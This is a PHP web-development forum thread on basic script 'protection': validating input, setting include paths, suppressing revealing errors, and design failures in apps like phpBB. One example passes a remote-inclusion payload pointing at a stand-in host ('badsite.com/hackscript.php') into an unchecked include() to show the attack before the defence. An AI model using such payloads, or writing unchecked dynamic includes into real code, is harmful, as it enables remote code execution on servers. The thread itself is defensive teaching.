Protection in PHP Scripts :: Basic PHP Security information
MatthewHSE
Status: Contributor
Joined: 20 Jul 2004
Posts: 122
Location: Central Illinois, typically glued to a computer screen
In a previous thread, "protection" in scripts was mentioned. I'm not familiar with that term, so it would be great to see a basic primer of just what it means and how to work in such protection.

The only thing I can think of is that "protection" equates to error handling, fault tolerance, and/or validating user input. Is that correct, or is protection a completely different issue?
techAdmin
Status: Site Admin
Joined: 26 Sep 2003
Posts: 4126
Location: East Coast, West Coast? I know it's one of them.
That's right. Protection means anticipating errors, crack attempts, data validation problems, etc.

That's the hardest part of programming: making something sort of work is relatively easy, but making it reasonably hack- and error-proof is really hard.

Places to check out:

phpsecurity.org

phpsec.org

And many other sites.

Any O'Reilly PHP book will help; Programming PHP by Rasmus Lerdorf, for example, has a nice introductory chapter on PHP security. Or, if you really want to become a master, Essential PHP Security by Chris Shiflett. O'Reilly is the best in most cases.
MatthewHSE
I see. In that case, when you have time, would you be able to give a quick rundown of why the code I posted previously doesn't have much protection built in? I thought it was pretty tight myself, but of course I'd like to know about any holes, etc., it may have in it.
techAdmin
In this case it was the JavaScript part, I think. The PHP looks fine from what I can see, although you never know: one day some cracker somewhere may figure out another hole. But since you are using hard-coded file values, it's a lot safer.

Once scripts get more complex there are more places for error and validation problems to slip in.

One thing I do note, however: as an experiment to learn Ajax this is a great project, very useful. But as a practical solution for entering and checking an email address for a mailing list, I'd go with a straight PHP page submitting to itself, checking against a database, then spitting out either a success or failure message.

But as an Ajax exercise it was definitely useful; I just wouldn't use it for production purposes because it depends on JavaScript.

That's how you learn new stuff, though: you create a problem and solve it. You won't learn anything if you don't do that.
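A minimal sketch of that plain-PHP alternative: a page that posts to itself, validates the address, and prints success or failure. The function names here are illustrative, and the actual mailing-list database check is left as a comment.

```php
<?php
// Sketch: self-submitting form handler. The database lookup/insert is
// stubbed out; only the validation and control flow are shown.

function is_valid_email($email)
{
    // filter_var() has offered email syntax validation since PHP 5.2
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

function handle_submission(array $post)
{
    if (!isset($post['email']) || !is_valid_email($post['email'])) {
        return 'That does not look like a valid email address.';
    }
    // ... check the address against the mailing list db, insert it, etc. ...
    return 'Thanks, you are on the list.';
}

// Self-submitting: only process when the form was actually posted
if (isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    echo handle_submission($_POST);
}
```

No JavaScript involved, so it works for every client.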
MatthewHSE
Yes, I'll definitely be rewriting that whole thing to use a database, although I think I'll try the Ajax technique in production for a while just to see how it goes. I know its dependence on JavaScript will mean some users won't get to use it, but around 95%+ of my users have JS turned on anyway. And since I'm writing the whole form with document.write, non-JS users won't see it at all, so they won't run into any annoying errors, missing features, or malfunctions. (Or am I thinking all wrong with that?)

I'm glad to know protection is about what I thought it was. I'm almost paranoid about security, and validating data is always the first thing I do with user input. And of course I always follow the standard security policy of ONLY accepting data that I expect to receive - anything else gets thrown out right away.
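That "only accept what you expect" policy can be sketched as a whitelist filter; the field names and rules here are hypothetical examples.

```php
<?php
// Sketch of whitelist validation: each input must match an explicit
// rule, and anything unexpected is silently dropped.

function clean_input(array $input)
{
    $clean = array();

    // Expect a purely numeric id
    if (isset($input['id']) && ctype_digit((string) $input['id'])) {
        $clean['id'] = (int) $input['id'];
    }

    // Expect one of a fixed set of actions
    $allowed = array('view', 'edit', 'delete');
    if (isset($input['action']) && in_array($input['action'], $allowed, true)) {
        $clean['action'] = $input['action'];
    }

    return $clean;
}
```

Anything not on the list never makes it past the filter, so there is no need to enumerate bad inputs.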
techAdmin
It's not paranoia, it's being smart about it.

Paranoia is being pointlessly afraid of something that exists as a likelihood only in your own mind.

I track the new exploits running automated through the web every week; you can see them in 404 pages. I can always tell when a new script vulnerability has been discovered, because a while afterwards automated bot scripts run through the web looking for those pages. xmlrpc.php on older WordPress versions, for example, was about a month ago.

I have one site, I won't say where, that generates dynamic include paths. I forgot to check for one thing, then suddenly noticed 404 and 500 internal server error reports on that site. I took a look, and sure enough, I'd forgotten to protect the include by double-checking that the file existed on the server before proceeding. The error condition in that case now triggers a polite 'nice try' message to the would-be hacker.

In that case the joke was on the potential cracker: they assumed it was database-driven, but it uses only static flat files, so the most you can do is crash the page.

Email contact form scripts are also problematic, as are any improperly escaped and unprotected SQL routines.

Being 'paranoid' is the smart way to program. In fact, you can just remove the word 'paranoid' and replace it with 'properly careful, anticipating future attacks and server compromises before they happen'.

More rigorous protection includes using PHP's error reporting options to turn off all error output, which can otherwise frequently be used to discover the actual server paths of the site.
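One common way to set that up, as a sketch: suppress error display so paths never leak to visitors, while still logging errors for yourself. The log path here is a hypothetical example.

```php
<?php
// Sketch of a production error-handling setup: record everything,
// display nothing, so file paths never leak into the page.
error_reporting(E_ALL);                          // still record all errors...
ini_set('display_errors', '0');                  // ...but never print them
ini_set('log_errors', '1');                      // keep them in a log instead
ini_set('error_log', '/var/log/php_errors.log'); // hypothetical log path
```

That way debugging information is still available to you, just not to the visitor.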

Error detection and handling is a big part of programming, I'm not very good at it, I just have faith...LOL...
MatthewHSE
:: Quote ::
I'd forgotten to protect the include by double checking that the file existed on the server before proceeding.


I find that interesting. I won't ask you to divulge the site in question, but could you explain the concept a bit further? I never thought about checking for the presence of an include before - but then I've always hard-coded those up until now. In any case, how would the absence of the file be an opening for a hacker?
jeffd
Status: Assistant
Joined: 04 Oct 2003
Posts: 594
Here's a very general overview of security questions [called: The Six Dumbest Ideas in Computer Security]. It deals primarily with network security, but takes a look at the programming end of things too.

Especially relevant is number 3:

:: Quote ::
Let me put it to you in different terms: if "Penetrate and Patch" was effective, we would have run out of security bugs in Internet Explorer by now. What has it been? 2 or 3 a month for 10 years? If you look at major internet applications you'll find that there are a number that consistently have problems with security vulnerabilities. There are also a handful, like PostFix, Qmail, etc, that were engineered to be compartmented against themselves, with modularized permissions and processing, and - not surprisingly - they have histories of amazingly few bugs.

It's with some sadness that I have to point out that virtually all popular web software was written using the 'penetrate and patch' model, from phpbb, wordpress, on up.

That is, instead of holding new features back until they have been heavily screened for security, they tend to throw new stuff into these packages, hope no problems show up, then patch the problems when they do appear.

Number 6 covers the main reason for this:

:: Quote ::
IT executives seem to break down into two categories: the "early adopters" and the "pause and thinkers." Over the course of my career, I've noticed that dramatically fewer of the "early adopters" build successful, secure, mission-critical systems. This is because they somehow believe that "Action is Better Than Inaction" - i.e.: if there's a new whizzbang, it's better to install it right now than to wait, think about it, watch what happens to the other early adopters, and then deploy the technology once it's fully sorted-out and has had its first generation of experienced users.

In other words, think of the phpbb developers adding features because they seem 'cool'. Think remote avatars, remote file uploading, forum search, etc. These have been the main security issues in, for example, phpbb.

There have been many others, but almost all come from too many features added too fast with not enough testing and preplanning and security focus.

The real problem is it takes experience to do it right, and you can't get experience in most cases unless you do it wrong first.

Clearly some cases are out of your control; for example, recently there was a PHP vulnerability that was out there for a while, known and not patched. There's not a lot you can do about that.

Not sure if this ties in with your question, but this is a fairly serious security guy, there are many others, so it gives you some idea of the mindset that's required to produce secure systems.

I'm not particularly good at that end of things, but I try.
techAdmin
Nice read; good for a general idea of security, I'll admit.

For more precise security stuff, you can read various webmasterworld php security threads [google search].

Note that not everything in, for example, this thread is right; using .inc extensions does not necessarily mean that hackers can read your .inc files, that's just plain wrong. Then there's this one, which gets into it even more thoroughly. As you can see, PHP security is not a trivial topic. And that's just one site; there's tons of material on PHP security out there. The main problem is that junior hackers and programmers don't bother reading up on it before they start coding away.

PHP is always placed within <?php ... ?> tags, whether in library files named .php or .inc. I like .inc because it makes library files easy to tell apart from standard PHP files. Just a preference; it makes no particular difference, and if the server parses .inc as PHP it's just another extension.

Set global include paths
A good observation is made in the first WMW thread I linked to about setting your PHP include path in .htaccess or httpd.conf. Let's say you set your include path in .htaccess to:
:: Code ::
php_value include_path ".:/usr/www/includes"
# while your actual website, publicly accessible, lives here:
#   /usr/www/yoursite/
# in other words, when Apache gets a request for index.html, it serves:
#   /usr/www/yoursite/index.html

This means all includes will use that directory as their base.

With one large exception: paths that start with http://, ftp://, or / will pull the include from that location directly. In other words, the include path is overridden if an absolute path to the filesystem root, or a URL to an external site, is given instead. This is a major thing you have to protect against.

Many hosters turn off the ability to access remote files in includes, but not all do. You can also override this yourself on a case-by-case basis.
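Whether your host permits remote file access at all is controlled in php.ini; here is a quick sketch to check from a script. (allow_url_include was split out of allow_url_fopen in PHP 5.2 and is off by default.)

```php
<?php
// Sketch: report whether this PHP install permits remote file access
// in fopen-style functions and in include/require.
$url_fopen   = ini_get('allow_url_fopen');
$url_include = ini_get('allow_url_include'); // empty on pre-5.2 installs

echo 'allow_url_fopen: '   . ($url_fopen ? 'On' : 'Off') . "\n";
echo 'allow_url_include: ' . ($url_include ? 'On' : 'Off') . "\n";
```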

Note that the includes folder set in that path is not accessible over the web. Exposed include folders are my absolute top pet peeve with most major web-based apps, blogs, forums, whatever. Even shopping carts do this, which is totally inexcusable, since they should be as secure as possible.

So say you have
:: Code ::
$page = $_GET['page'];
include('pages/' . $page);

If a hacker somehow tries to get a remote script included, it might then look like this:

:: Code ::
$page = $_GET['page']; // hacker inserts: http://badsite.com/hackscript.php into 'page'
// which gets inserted into the include:
include('pages/' . 'http://badsite.com/hackscript.php');
// which resolves to this nonexistent path:
//   /usr/www/includes/pages/http://badsite.com/hackscript.php
// and triggers an include error, since that file does not exist on the server.

Note that here you set the include to 'pages/' . $page. If you remove this protection, you can see that the attacker's script could run internally on your server. Not good. You can also prepend './' to the path, which makes PHP look in the default include directory as the starting point.

Chasing after the crackers
Sometimes people check for '://' in the string; then hackers replace those characters with hexadecimal equivalents; then you have to check for the hexadecimal versions in the string too, and on it goes.
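A quick illustration of why that arms race is unwinnable with string checks alone; the URLs here are hypothetical:

```php
<?php
// Sketch: a naive strpos() blacklist misses a percent-encoded URL
$obvious = 'http://badsite.com/hackscript.php';
$sneaky  = 'http%3A%2F%2Fbadsite.com%2Fhackscript.php';

var_dump(strpos($obvious, '://') !== false); // bool(true)  -- caught
var_dump(strpos($sneaky, '://') !== false);  // bool(false) -- slips through

// Decoding first catches this round, but double encoding, other schemes,
// and so on keep the chase going indefinitely
var_dump(strpos(urldecode($sneaky), '://') !== false); // bool(true)
```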

However, you can skip all that by just using:

:: Code ::
if ( file_exists ( $full_path ) )
{
  // do some stuff
}
else
{
  echo 'go away and leave our site alone';
}

As one example, this just stops execution right there if the file doesn't exist on the server. You can create the whole path with
$full_path = get_include_path() . '/' . $path;
(note that get_include_path() returns the entire include_path string; if it lists more than one directory, build the path from the specific directory instead)

And so on. In other words, it's totally irrelevant what the cracker tries in that case: if the file isn't on your server, it doesn't matter how tricky they get. This isn't to say they won't get in somehow or other, especially through a weak product like phpbb or WordPress. But for your own code, where you can follow proper security practices, you can do a lot better.
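One caveat worth adding: file_exists() stops remote includes, but a local string such as '../../some/other/file' can still name a file that really does exist on the server. A common companion check, sketched here with a hypothetical directory layout, resolves the path with realpath() and confirms it stays inside the intended directory:

```php
<?php
// Sketch: resolve the requested page and verify it lives under $base_dir.
// Returns the resolved path, or false for anything outside the directory.
function safe_include_path($base_dir, $page)
{
    $base = realpath($base_dir);
    $full = realpath($base_dir . '/' . $page);

    // realpath() returns false for nonexistent files and resolves any
    // ../ tricks, so a simple prefix test catches traversal attempts
    if ($base === false || $full === false) {
        return false;
    }
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $full;
}
```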

One of the main ways phpbb was attacked a year ago was through the GET variable in the forum search string. They'd neglected to protect it, which allowed forum crackers to simply call a script from a remote site, run it, take over phpbb, and knock the forum offline.

There are a few reasons this was possible; foremost is the decision, which is horrible coding and security practice, to make phpbb basically a one-click install.

Globals:: Don't use them
Global variables are always bad design in my opinion. It's easy to lose track of them, not using them was one of the very first things I learned in programming classes, and I never have since then. Globals = sloppy programming.

Bad security by design
Whereas all the includes should live outside the web-accessible site root, they are instead fully exposed. This gives crackers direct access to any page they want to attack. Second, to make installation easy, since many hosting setups do not support .htaccess, these apps do not follow an overall include path set in .htaccess but basically hardcode that value into each page. This is bad practice, done purely to make installation easy.

Does this sound familiar? It should, this is the exact type of decision Microsoft makes for their Windows products.

Phpbb is a perfect example of what jeffd posted above, bad design leading to hacks leading to patches. I like phpbb, but I don't like the decisions they made to make it 'user friendly and easy to install'. That's a bad decision.

No template or include file should be web-accessible under the site document root. That's my opinion. Include paths should always be set in .htaccess or httpd.conf, depending on your hosting privileges. These are like the ABCs of security.

Protect all data that is modifiable by users, whether you realize it or not
No GET query string value should ever be able to call a remote file. No POST value should ever be able to call a remote file in any way.
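The strictest way to honor that rule is to never let the query string touch a path at all: map it onto a fixed list of known pages. The page names here are hypothetical examples.

```php
<?php
// Sketch: whitelist map from GET value to include file. Unknown keys
// fall back to the default, so raw input never reaches the filesystem.
function resolve_page(array $pages, $requested)
{
    return isset($pages[$requested]) ? $pages[$requested] : $pages['home'];
}

$pages = array(
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
);

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
// include 'pages/' . resolve_page($pages, $requested);
echo resolve_page($pages, $requested) . "\n";
```

With this approach there is nothing to sanitize, because the input is only ever used as an array key.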

These are the most common errors I see, and most are a direct result of catering to users on really bad hosters that give little or no rights to the users. Catering to that lowest denominator is a very bad idea.

I'm just using phpbb as an example, you can point to almost any major web based application, open or closed source, and find the same problems. Caused by the same mistake, trying to make something user friendly for newbies. Bad idea. Always a bad idea. This is why windows and internet explorer are fundamentally insecure. There's a certain irony in seeing open source projects that tend to be heavily MS critical do the same exact thing wrong.

And I'd note, I think as these things go, phpBB is quite a bit better coded than other apps I've looked at.

Error protection
Anyway, to answer your question: let's say you don't totally protect against bad includes as in the case above. You can check whether the file exists, or you can block error output by, for example, using the '@' error-suppression operator, like this:

:: Code ::
@include('pages/' . $page );
// or you can use a global switch:
error_reporting(0);
// set at the beginning of the script, this turns all error reporting off

For development you can comment this out. Of course there's a big problem debugging errors that users find with everything suppressed, which is why I avoid it in general, though it's a good idea for more critical stuff in many ways.

If $page is invalid for whatever reason, then rather than printing out your entire web path in a PHP error message ('path /usr/www/yoursite/includes/http://badsite/fred.php does not exist'), the page just does nothing.

Without that suppression, the error is still the end of this particular road for the cracker, but they now know the path to your include folder and the path to your server root. That's more information than they had before.

This is one example of protection. Personally, I'd rather put out code that can't be broken like this than rely on error suppression, but that's a choice, and relying on suppression alone is a mistake in many cases.

For a while, some of my sites returned an error message when they were hit by non-Windows or non-Linux systems, for example. This was due to a simple mistake and a lack of testing with real data. Not good, needless to say. Putting real, significantly large scripts out on the web, interacting with real traffic, is a good way to get familiar with what can happen.

BACKUP!!!
And of course, back up your stuff!!! Something will fail at some point. How many times have I read about webmasters who lost their entire sites to a hack or server failure? Back up routinely; it pays. Hopefully you'll never need to use your backups, but maybe you will.
jeffd
A simple sample: copy this into a file, save it to some development site on your box (say the site is called site1), and call the page in.php:

:: Code ::
<?php
$path = 'http://techpatterns.com/';
if ( file_exists( $path ) )
{
   include ( $path );
}
else
{
   echo 'bad, very bad, that\'s not nice';
}
?>

As you can see if you run this locally as site1/in.php, you will get the error message, because the file does not exist on the local machine.

Now remove the protection:

:: Code ::
<?php
$path = 'http://techpatterns.com/';
include ( $path );
?>

and run it again, and you should see the home page of techpatterns.com. That means any code contained in that page ran internally on your server, since it was included and executed by your script.

Again, most hosters block by default the ability to access remote files.

Now another version:
:: Code ::
<?php

$path = './' . 'http://techpatterns.com/';
include ( $path );
?>

which produces these error messages:

:: Code ::
Warning: main(./http://techpatterns.com/): failed to open stream: Invalid argument in c:\yoursites\site1\in.php on line 4

Warning: main(): Failed opening './http://techpatterns.com/' for inclusion (include_path='.;c:/yoursites/includes/') in c:\yoursites\site1\in.php on line 4

Notice here that the file was not included: because you prefixed ./, PHP treats the string as a relative file path under the include path you set earlier rather than as a URL. Since no file named 'http://techpatterns.com/' exists there, you get an include error. But you don't want that error shown, since it gives away some information, and it's ugly and not user friendly.

So you change the above to:
:: Code ::
<?php
$path = './' . 'http://techpatterns.com/';
if ( file_exists( $path ) )
{
   include ( $path );
}
else
{
   echo 'bad, very bad, that\'s not nice';
}
?>

and you get this output:
:: Code ::
bad, very bad, that's not nice

and that's it. There's no way the attacker can hit you from that particular vector. But they can get at you in many other ways; this simply covers case 1, the simplest and easiest case to avoid.